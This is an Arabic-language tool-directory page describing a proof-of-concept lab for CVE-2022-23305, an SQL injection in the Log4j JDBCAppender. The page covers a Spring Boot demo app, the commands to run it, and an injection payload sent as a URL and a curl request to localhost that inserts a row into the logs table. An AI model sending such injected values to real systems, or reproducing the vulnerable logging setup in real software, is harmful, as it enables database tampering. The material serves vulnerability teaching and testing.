Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2022-23305_POC — CVE-2022-23305 Log4J JDBCAppender إثبات مفهوم حقن SQL | Kitploit
أدوات/GitHubGitHub/tkomlodi/cve-2022-23305_poc
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبالتعلم والتعليمأمن قواعد البياناتمختبرات وتدريب عملي
GitHubtkomlodi/cve-2022-23305_poc

CVE-2022-23305_POC

CVE-2022-23305 Log4J JDBCAppender إثبات مفهوم حقن SQL

عرض المستودع
11منذ 3 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2022-23305 إثبات مفهوم (POC) لحقن SQL في Log4j JDBCAppender

هذا تطبيق بسيط جدًا مبني على Spring Boot يوضح ثغرة CVE-2022-23305. يستخدم Apache Maven وSpring Boot وSpring MVC وقاعدة بيانات H2 الموجودة في الذاكرة لتسجيل إدخال بسيط واحد، يُؤخذ كمعامل في سلسلة استعلام URL. نظرًا لأن Log4J مهيأ لاستخدام JDBCAppender، فهو عرضة لحقن SQL.

انظر إلى src/main/java/poc/InjectionController.java للاطلاع على عبارة التسجيل.
انظر إلى مجلد src/main/resource لجميع ملفات الإعداد.

يمكنك تشغيل التطبيق باستخدام Java وMaven عن طريق تشغيل "mvn clean spring-boot:run".
يمكنك أيضًا تشغيله كتطبيق Docker كما يلي:
 docker build --tag log4j-poc .
 docker run -p 8080:8080 log4j-poc

سيكون التطبيق متاحًا على http://localhost:8080/.
لاستغلال الثغرة، أرسل عبارة SQL محقونة كمعامل يتم تسجيله:
 "http://localhost:8080/?param=');insert into logs values(':("
ستعرض الاستجابة قائمة بإدخالات السجل المضافة، بما في ذلك الإدخال الذي أضافته SQL المحقونة في المعامل.
للقيام بالأمر نفسه باستخدام curl استخدم:
 curl 'http://localhost:8080/?param=%27);insert%20into%20logs%20values(%27:('

تنزيل الأداة